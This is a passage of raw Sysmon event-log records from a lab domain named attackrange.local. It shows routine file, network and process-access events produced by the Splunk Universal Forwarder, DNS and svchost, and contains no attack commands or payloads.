Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00865626420DD06E9A626AF96F9A72DF,SHA256=09174E6F7E524E3D96E73C32EFAF04150BB2D0C8183BA8CE32030E9F25F10357,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606600Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:51.162{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606599Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:51.162{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0432FEAC5FEA56287F84175E9AFD9178,SHA256=4FA3D6E5BB91FF979EEC9A0832D020D84D98F5B13ECFF0E580186E43006594ACfalsefalse - insufficient disk space 354300x80000000000000001095317Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:46.544{761B69BB-819C-607D-2800-00000000BA01}2912C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local52381- 10341000x80000000000000001095316Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:51.524{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095315Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:51.524{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095323Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:52.986{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BA977D874E782764CDE87A4E6C91EBE,SHA256=34203FCD4D21ED964DCCD9E311F8D5FEAA8FB720766CFA6510BF254C65A4AA76,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606602Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:52.164{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606601Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:52.164{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBF46BB33EAC47D01524943D63052AA5,SHA256=93091428C04E12504650A9B934527F2CBB225C2C8516275F7DD7294BF259EE59falsefalse - insufficient disk space 354300x80000000000000001095322Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:47.843{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1162-false10.0.1.12-8000- 10341000x80000000000000001095321Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:52.525{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095320Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:52.525{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095319Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:52.253{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BEA563A6CEACFB90C1C999A82C8748EF,SHA256=CFC83C871148CF376F0BB109B36F9B970EBD111C3E572FC7486079EE0CA9DE10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095326Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:53.989{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E86869C8200EEC871551E5AC83B6F232,SHA256=344BC8D356E1F626233707E9017F6F2B7D74EE3AA8336FD12C47239D3356AAFC,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606604Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:53.167{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606603Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:53.167{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70B0744113261D8994E2DBE13220EE53,SHA256=56A8EC5A4D1FFD38188CF077CA03B867CFC30AA32840A689EF2A878316294C56falsefalse - insufficient disk space 10341000x80000000000000001095325Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:53.525{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095324Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:53.525{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095329Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:54.994{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEB0397B88E7C234A7F5E5DD0D02FACF,SHA256=5B3A866014E5F0DBCBADDC1847BACDC749DFBF761329DAC94B1CE671543F0379,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606606Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:54.385{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606605Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:54.385{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6BFCED19554231E14A3533120DA7AF3,SHA256=EC68DC8E7172BC381A3FC0DB14B2DF8DD72DAE46ADA6B99040581C9F5F491F38falsefalse - insufficient disk space 10341000x80000000000000001095328Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:54.526{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095327Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:54.526{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606608Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:55.403{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606607Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:55.403{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFD3F7503975A3D0290EBDCF2DCE4EF8,SHA256=FAF4BA8D67F3FADE2668B29FADA29C7D8858B96AB7ADF714EF0BCB73B0696560falsefalse - insufficient disk space 10341000x80000000000000001095331Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:55.526{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095330Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:55.526{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001606615Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:54.799{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49737-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606614Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:56.537{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606613Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:56.537{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7D61F7D1433380BF683294000EECD01,SHA256=196EB1253475884C24F3071E27207EF891CB9E54C20566C07C9605154D862319falsefalse - insufficient disk space 10341000x80000000000000001095334Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:56.527{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095333Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:56.527{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095332Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:56.005{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A060CBEC1A88ADB287E058FE0FF0A7C3,SHA256=5D4C33E029D49BA966984713A9677C33762B07F0AE810D775A125C521973C69C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606612Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:56.274{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606611Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:56.274{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26211F6EB429C67CE4494899646FD09A,SHA256=865D02890602891040F572D8AF9507549AE25DD0941C1FED8A7D7F297BD29999falsefalse - insufficient disk space 11241100x80000000000000001606610Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:56.274{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606609Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:56.274{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DE94CE48852886893A8C7C7292250091,SHA256=643D82078AE4D5B1EE820E054B2638222C8B586A31BEC75CE2CC0B53CB583AADfalsefalse - insufficient disk space 11241100x80000000000000001606617Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:57.608{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606616Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:57.608{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AD18A2A24F6704CFEA3460D23769993,SHA256=E850E9481310603E58C8639BC15E5AF3687C217EE94BC01F16E2B2C6F101705Cfalsefalse - insufficient disk space 10341000x80000000000000001095337Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:57.528{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095336Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:57.528{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095335Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:57.020{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8D48BE2E81982B41F41CD91D08D77F9,SHA256=A769DF69C836585E64B479C111EA84F5B121B61A69DCD76AE4E8A1C68CE8E629,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606619Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:58.610{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606618Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:58.610{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=322CDE686DEDFE8EF0ED41D3AC0AF6B8,SHA256=6DAC197FF075757D710548E15EAAF0D99EF157CA47148F68F4754CD809FB9DD9falsefalse - insufficient disk space 354300x80000000000000001095343Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:53.730{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1163-false10.0.1.12-8000- 10341000x80000000000000001095342Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:58.529{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095341Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:58.529{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095340Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:58.347{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B3F73D2EB2A7B05F4ACF6AA6F751872D,SHA256=68735D04441679D2BE61D0F2771D54C3332614817035DEB1D106AA312E976BD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095339Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:58.346{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program 